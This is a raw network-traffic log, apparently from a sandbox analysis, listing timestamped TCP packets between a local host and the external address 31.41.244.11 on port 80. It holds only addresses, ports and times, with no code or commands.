Jan 7, 2025 10:09:00.580094099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.580122948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.580176115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.580187082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.580235004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.610632896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610642910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610657930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610667944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610677958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610688925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610707998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610718012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610727072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610790014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.610845089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.610918045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610928059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610945940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610955954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610966921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610975981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.610994101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.610994101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611044884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611056089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611056089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611057043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611104965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611104965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611196041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611212969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611224890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611234903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611243963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611253023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611258984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611258984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611264944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611279011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611310959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611310959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.611380100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.611422062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.629285097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629306078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629314899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629359007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629369020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629379034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629478931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.629478931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.629499912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629511118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629519939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.629543066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.629570007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.663652897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663839102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663850069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663866997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663877964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663893938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663903952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663913965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663923979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663934946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663944960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663955927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.663959026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.663959026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.663969040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664005041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664005041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664005041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664043903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664055109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664055109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664066076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664077044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664088011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664104939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664155960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664155960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664237976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664253950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664263964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664273024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664283991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664300919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664310932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664314032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664314032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664324999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664336920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664350033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664360046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664367914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664367914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664376974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664408922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664458990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664462090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664479017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664489985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664499998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664513111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664520979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664520979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664520979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664571047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664571047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664587021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664597988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664644003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664680958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664693117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664704084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664731026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664767981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664767981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664778948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664809942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664809942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664820910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664844036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664880037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664880991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664880991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664891005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664932013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664937019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664937973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664943933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664954901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664983988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664983988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.664984941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.664998055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665004015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665029049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665071964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665213108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665221930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665231943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665261030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665261984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665277958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665280104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665294886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665306091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665322065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665348053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665374041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665380955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665390015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665421009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665700912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665744066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665755987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665785074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665785074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665798903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665812016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665838003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665841103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665848017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665854931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665864944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665877104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665877104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665883064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665894032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665898085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665924072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665935993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.665965080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665965080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.665992975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666003942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666062117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666062117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666109085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666121960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666169882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666169882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666493893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666505098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666515112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666564941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666564941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666604042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666615963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666625977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666636944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666646004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666646957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666688919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666688919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666765928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666776896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666786909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666811943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666827917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666841030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666842937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666852951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666863918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666876078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.666902065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666902065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.666940928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.694134951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697403908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697515011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697525978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697562933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697562933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697587967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697599888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697612047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697624922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697628021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697639942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697681904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697690010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697690010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697695971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697736025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697746992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697772980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697776079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697776079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697784901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697834969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697834969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.697936058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697968006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697979927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.697979927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698009014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.698018074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698019028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.698039055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698046923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.698050022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698064089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.698105097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698118925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.698131084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.698134899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698152065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.698179960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.716165066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716176987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716193914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716223955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716236115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716247082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716249943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.716259003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.716274977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.716319084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.716319084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.750601053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750613928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750633955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750648975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750660896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750672102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750679970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.750679970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.750684977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750736952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.750736952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.750849009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750888109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750897884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750921965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.750955105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750966072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750978947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750991106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.750997066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751002073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751033068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751033068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751053095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751080036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751091957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751122952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751133919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751144886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751156092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751169920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751169920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751169920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751194000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751218081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751247883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751249075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751264095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751272917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751306057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751306057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751306057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751352072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751363993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751379013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751389027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751399994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751408100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751445055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751461029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751468897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751482010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751492977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751502991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751517057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751526117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751526117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751529932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751544952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751554012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751562119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751574039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751585007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751599073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751600981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751600981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751642942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751687050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751791954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751807928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751818895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751838923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751849890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:00.751857996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751869917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:00.751873016 CET	50017	80	192.168.2.4	31.41.244.11
